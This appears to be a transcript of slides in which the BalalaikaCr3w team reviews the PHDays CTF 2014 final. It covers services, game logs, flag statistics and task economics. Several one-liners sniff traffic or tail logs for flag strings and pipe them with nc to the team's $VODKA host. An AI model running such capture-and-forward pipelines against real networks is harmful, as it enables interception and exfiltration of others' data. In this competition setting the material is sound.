phdays ctf 2014 final
DESCRIPTION
Short review of Positive Hack Days CTF 2014 Final by BalalaikaCr3w team.TRANSCRIPT
PHDays CTF 2014 FinalMax Moroz
June 07, 2014
whoami
Max Moroz
Captain Job: C++, Objective-C, Java Freelance: pentesting Interests: crypto, forensic, misc
BalalaikaCr3w
./teaminfo
which CTF
which CTF
which CTF
which CTF
cat rules.txt
• Ubuntu 14.04• services:
– cardbook (:1234)
= 12 × 3– mobol (:3123)
= 24 × 2– holynet (:80)
= 48 × 1
#PREPARE TO BATTLE
./tribute –to=SecurityFirst
• tcpdump –A port 80 | grep ‘\w\{32\}’ | nc $VODKA• tcpdump –A port 1234 | grep ‘\w\{32\}’| nc $VODKA• tcpdump –A port 3123 | grep ‘\w\{32\}’ | nc $VODKA
#P0WN3R ACHIEVEMENT UNLOCKED
DEBUG:root:new game!DEBUG:root:suits in game: ['S', 'D', 'C', 'H', 'E', 'A', 'T', 'Z']DEBUG:root:received cards: set(['2ofE', 'AofD', '6ofA', 'KofH', '3ofA', '10ofT', '5ofH', '4ofH', '9ofH', '6ofS', 'AofT', 'AofZ', 'JofC', 'QofH', '3ofT', '4ofD', '8ofC'])DEBUG:root:state is 0, hand is 2ofE AofD 6ofA KofH 3ofA 10ofT 5ofH 4ofH 9ofH 6ofS AofT AofZ JofC QofH 3ofT 4ofD 8ofCDEBUG:root:Received: INFO: players in this session: [0, 2, 4, 5, 6, 7]<…>DEBUG:root:Received: TRICK SUCCEEDEDDEBUG:root:state is 0, hand is DEBUG:root:Received: INFO: new roundDEBUG:root:state is 0, hand is DEBUG:root:Received: END. WIN! Take your prizes: b1bbee3e61d9dbd2b808b9d6efc55ac6 2f00f06026cdabe99c09725431b84064 4ba4c7f5f44563c73be0a436f0474a4f ae2c9ce87ddafa1d8eb715eee6e61f4f c62c93363e933111a4dd502477b8d386 3dbf50201f9bc2e5b4d7d2f268b2e868 1f958958cead352be5810b49ca5ca378 8ba6516044e9926822a6dc85bdee591f e762d36f93384a29140f70c73d45e398 655cfa6d598710475734e50212d6ef5aDEBUG:root:game ended, I won
./cardbook
• tail –f cardbook-stderr.log | grep ‘\w\{32\}’ | nc $VODKA
./mobol
./exploit_mobol –thanks-to=bay
./holynet
./exploit_holynet
VODKA
FLAGS STATISTICS:
Flags found: 4426
Successfully sent: 1249
Waiting for resend: 85
Bad flags: 0
All FlagsSubmitted
./vodka --stat
cat game_economics.txt
Task Name Reward (gold) Price (Power) Price (Armor) Price (Fuel)crackme 1000 15 0 0
breadcrumbs 2500 12 16 1musicforsoul 2500 15 4 6
mars2 2000 22 6 0holygrail 2000 13 2 5
homepage 2500 4 8 8doubleshizo 3000 0 21 5
oracle2 5000 19 27 6mooditter 5000 64 5 2
pyhtonisback 1000 14 1 0tera 2000 4 9 7
packIt9000 5000 4 7 21Wolfram|ɛπτα 2000 18 5 2
lockpicking 2000 15 5 3my favorite sequel 4000 8 22 7
schoolmath 2000 1 14 3Total 43500 228 152 76
Gold from selling 3648 3648 3648
cat game_economics.txt
Task Name Reward (gold) Price (Power) Price (Armor) Price (Fuel)crackme 1000 15 0 0
breadcrumbs 2500 12 16 1musicforsoul 2500 15 4 6
mars2 2000 22 6 0holygrail 2000 13 2 5
homepage 2500 4 8 8doubleshizo 3000 0 21 5
oracle2 5000 19 27 6mooditter 5000 64 5 2
pyhtonisback 1000 14 1 0tera 2000 4 9 7
packIt9000 5000 4 7 21Wolfram|ɛπτα 2000 18 5 2
lockpicking 2000 15 5 3my favorite sequel 4000 8 22 7
schoolmath 2000 1 14 3Total 43500 228 152 76
Gold from selling 3648 3648 3648
./WASTED
cat game_economics.txt
Task Name Reward (gold) Price (Power) Price (Armor) Price (Fuel)crackme 1000 15 0 0
breadcrumbs 2500 12 16 1musicforsoul 2500 15 4 6
mars2 2000 22 6 0holygrail 2000 13 2 5
homepage 2500 4 8 8doubleshizo 3000 0 21 5
oracle2 5000 19 27 6mooditter 5000 64 5 2
pyhtonisback 1000 14 1 0tera 2000 4 9 7
packIt9000 5000 4 7 21Wolfram|ɛπτα 2000 18 5 2
lockpicking 2000 15 5 3my favorite sequel 4000 8 22 7
schoolmath 2000 1 14 3Total 43500 228 152 76
Gold from selling 3648 3648 3648
./balance
echo $SCOREBOARD
